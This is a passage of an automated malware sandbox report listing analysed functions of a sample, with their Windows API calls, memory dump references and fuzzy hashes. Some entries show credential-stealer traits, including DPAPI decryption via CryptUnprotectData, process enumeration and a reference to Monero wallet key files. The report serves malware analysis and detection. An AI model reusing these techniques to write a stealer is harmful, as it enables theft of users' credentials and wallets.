                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C87C
                              • lstrcat.KERNEL32(?,00D50B46), ref: 00D3C943
                              • lstrcat.KERNEL32(?,00D50B47), ref: 00D3C957
                              • lstrcat.KERNEL32(?,00D50B4E), ref: 00D3C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: ee1c8d15561b2097973e029df35ecf6fd2317d7e12124cbc13d2f18f44a09959
                              • Instruction ID: b4c59a6ce5c5cc83c0bbd3808d2ade7ce9ee4d9b551219e305626d1d8b51db5c
                              • Opcode Fuzzy Hash: ee1c8d15561b2097973e029df35ecf6fd2317d7e12124cbc13d2f18f44a09959
                              • Instruction Fuzzy Hash: 154172B5D1421EDFDB10DF90DD89BFEB7B8BB88705F1041A8E509A6280D7705A84DFA2
                              Function 00D37240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D3724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D37254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D37281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D372A4
                              • LocalFree.KERNEL32(?), ref: 00D372AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 60ca03eb4728d864d7c5f140a560fab3a55ad206554a900b17c5001551236a41
                              • Instruction ID: a0f14374a0a4ed0602348e83a3ca322f6cd93249f4f57fa4afbeb20d22f0c997
                              • Opcode Fuzzy Hash: 60ca03eb4728d864d7c5f140a560fab3a55ad206554a900b17c5001551236a41
                              • Instruction Fuzzy Hash: 9B0152B5A40208BBDB10DFD4CD46F9E7778EB44700F104054FB09AB2C0D6B0AA409B66
                              Function 00D49600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D4961E
                              • Process32First.KERNEL32(00D50ACA,00000128), ref: 00D49632
                              • Process32Next.KERNEL32(00D50ACA,00000128), ref: 00D49647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00D4965C
                              • CloseHandle.KERNEL32(00D50ACA), ref: 00D4967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 626d855e5582ba2ab2215a5cc3b3dae0534022bdd73c80f4c8029e4d98054f31
                              • Instruction ID: 4ee5a42057771e3a31d93aa1a58a769cf60671df3c376c2c6afd4742fdf733d6
                              • Opcode Fuzzy Hash: 626d855e5582ba2ab2215a5cc3b3dae0534022bdd73c80f4c8029e4d98054f31
                              • Instruction Fuzzy Hash: 48011E75A00208EBCF14DFA5CD58BEEB7F8EB48301F114188A90997280D7349B80DF62
                              Function 010FD9EE Relevance: 6.5, Strings: 4, Instructions: 1529COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2n{$4<8>$;Pq$XS5
                              • API String ID: 0-991479744
                              • Opcode ID: c05a4dfa8bea9f1424cea984d7a8e6b61c0d4ae53a32c3cb0f349e05f6e8435a
                              • Instruction ID: 8f6e40abe24babcc3125abf3f3286eb24905076c369d01eccd9c0b4b52633691
                              • Opcode Fuzzy Hash: c05a4dfa8bea9f1424cea984d7a8e6b61c0d4ae53a32c3cb0f349e05f6e8435a
                              • Instruction Fuzzy Hash: B4A2D4F360C204AFE715AE19DC8567ABBE9EF94720F16493DEAC4C3740EA3558108797
                              Function 00D48680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00D505B7), ref: 00D486CA
                              • Process32First.KERNEL32(?,00000128), ref: 00D486DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00D486F3
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • CloseHandle.KERNEL32(?), ref: 00D48761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 3aae8c1ff3ea28ac74c2c85773fdc52f4e3cc7c4031706ba3c82fdfcd63614ce
                              • Instruction ID: c6aaabc0814f4796f5c9e8047aec75910ba3f5f0d96f2c58fa041177af550b93
                              • Opcode Fuzzy Hash: 3aae8c1ff3ea28ac74c2c85773fdc52f4e3cc7c4031706ba3c82fdfcd63614ce
                              • Instruction Fuzzy Hash: 20312B71941218ABDB24DF54DC55FEEB778EF45700F104199E50AA61A0DB306A89CFB2
                              Function 00D48EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00D35184,40000001,00000000,00000000,?,00D35184), ref: 00D48EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 10d526b4fbf9630c705398c801ab458f032dac51d314a13cfeb82f7e6d7a5d0a
                              • Instruction ID: eaccbf661ddf919203f35a69ca8b57278e3e6f11e164508d3a122650a359e6e8
                              • Opcode Fuzzy Hash: 10d526b4fbf9630c705398c801ab458f032dac51d314a13cfeb82f7e6d7a5d0a
                              • Instruction Fuzzy Hash: 71111874200208BFDB00CF64D884FAF73A9AF89740F149458F9198B250DB76EC85EB71
                              Function 00D39AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                              • LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: bcb87221899f459d76dfd2557d74281706ea4331deb705a2a54c7853f479e7a6
                              • Instruction ID: 120917ecae51940dcfa74374313fee2550dec3dd8a6d98ea7fa7dbfa19d65597
                              • Opcode Fuzzy Hash: bcb87221899f459d76dfd2557d74281706ea4331deb705a2a54c7853f479e7a6
                              • Instruction Fuzzy Hash: BE11A4B4240208EFEB10CF64DC95FAAB7B5FB89700F248058F9199B390C7B5A941DB51
                              Function 00D47980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E00,00000000,?), ref: 00D479B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D479B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00D50E00,00000000,?), ref: 00D479C4
                              • wsprintfA.USER32 ref: 00D479F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 66a5d8fb8d53fe71b617546a71303e85bf09cb84340d5b788f33c7ea459f5b5c
                              • Instruction ID: f565ec22e9d29f49563de3da586704529f090fc0957c512406adbf83a15e022e
                              • Opcode Fuzzy Hash: 66a5d8fb8d53fe71b617546a71303e85bf09cb84340d5b788f33c7ea459f5b5c
                              • Instruction Fuzzy Hash: 7A112AB2904118ABCB14DFD9DD45BBEB7F8FB4CB11F14425AF605A2280D3395940D7B2
                              Function 00D47A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008DDC68,00000000,?,00D50E10,00000000,?,00000000,00000000), ref: 00D47A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D47A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008DDC68,00000000,?,00D50E10,00000000,?,00000000,00000000,?), ref: 00D47A7D
                              • wsprintfA.USER32 ref: 00D47AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 7d39e3c1fe907fa0dd21e3c401c0a957b37854939702bb2b8ff2b492361e71f6
                              • Instruction ID: 54fec19354fc21b6df7f204724a13aa98b7b6bb6f2c826e59681ef597476c72b
                              • Opcode Fuzzy Hash: 7d39e3c1fe907fa0dd21e3c401c0a957b37854939702bb2b8ff2b492361e71f6
                              • Instruction Fuzzy Hash: 6F1182B1945218DFDB208B54DC49F59B778F744711F104395E90A932C0C7745A44CF62
                              Function 010FFB89 Relevance: 6.0, Strings: 4, Instructions: 966COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: F=|b$Jk/8$fw{~$b?
                              • API String ID: 0-647256904
                              • Opcode ID: 41bd60c0b9f4492807fc93697e46d02debf474d8285db95e5d02a40865a744ad
                              • Instruction ID: d2275d617216f832968ed6612947b13a1bd2f08e9ca81038407f2a6767725a94
                              • Opcode Fuzzy Hash: 41bd60c0b9f4492807fc93697e46d02debf474d8285db95e5d02a40865a744ad
                              • Instruction Fuzzy Hash: 00524CF3A086006FE704AE2DEC8177AB7D5EBD4360F1A463DE6C5C3744E97598018696
                              Function 010F4156 Relevance: 5.7, Strings: 4, Instructions: 749COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
